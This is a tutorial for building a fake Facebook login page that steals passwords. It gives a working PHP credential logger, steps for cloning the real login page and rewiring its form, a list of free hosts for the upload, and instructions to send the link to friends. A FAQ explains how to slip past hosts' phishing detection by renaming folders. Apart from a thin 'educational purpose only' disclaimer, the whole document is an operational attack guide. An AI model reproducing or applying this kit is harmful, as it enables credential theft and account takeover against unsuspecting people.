Facebook phishing

                                                                                                                      

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.

well, here we go for creating Fake page of Facebook…
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files

Step 1. Creating a login.php file>
Open notepad and  paste the following lines there… as save it with name login.php

____________________________________________

<?php
header (‘Location: http://www.facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
_________________________________________________

step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com….. then right click there> save as/save page as> then save it….

check the downloaded file…. there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)

2.2. Now open the htm file with notepad(right click> open with> notepad)…

and then press ctrl +F and search for action… and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word… but you have to find out the exact  type of line as shown in screen shot…. near which you will find a
tag and method=”post” something like that.

2.3. Now replace the url written after action with the name of your php file created in step 1.

Now your fake page is ready….
Save it with name index.html

Step 3: Uploading on a Free Hosting Site:

Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading on http://www.yourfreehosting.net/.
1.  first of all sign up for a free hosting Account.

There are some other free webhosting websites…

1. http://www.000webhost.com/473091.html

2. http://byethost.com/

3. http://www.up4.net/

4. http://www.mezoka.com

5. http://0fees.net/

2. After creating Account, login there, then go to control pannel> File Manager.

3. Now remove the preexisting index.html file.

4. Now click on upload files and then upload there index.html and login.php

5. Now click on New directory to make a new folder there and name it “Welcome to Facebook_files”

6. Now open the directory
“Welcome to Facebook_files”
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.

Now your phishing page is ready to hack
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and  their password will be saved in that file.

Note:- If you got any problem, then describe the problem in detail here.




———————————————————————————————-
———————————————————————————————-
Answer to Frequently asked question
1. Which URL you have to give to your friends or anyone else.
Answer: This is the domain url, that you have ordered/chosen during the time of registration, which is visible for you on almost every page of your free hosting site.  Still if you didnt get, then see the pic below….

Here, you see the URL is up there as i mentioned earlier. Also if you press OPEN, given in front of ur index.html file, then a new page will be open, having the url you need in the URL bar.

2. Photos are not appearing on your Fake page?

Answer: It happens because to detect a phishing page, web hosting sites are tracing the name of folders you are uploading, if they found same name as Facebook or any other site, then they dont let you make that folder/ or just block access of files from that folder. So if you just rename the directory uploaded in step 5, they their system will not recognize it. And after renaming you need to edit the index.html file and give this new name every where in file where you found old name. You can do it simply by opening the index.html file with notepad and replace the old directory name with the new name everywhere in the file.

3. log.txt file is not generating/ log.txt file is not saving passwords.

Answer: You should check all steps carefully, this is not a problem if you do every thing correctly.

4. When i open my fake page’s url, iget this error. http://error404.000webhost.com/?

Answer: It means ur page has been detected as a phishing page by the web hosting site, try renaming your folders and  files. (And dont forget to rename the file/folder name in index.html file also.)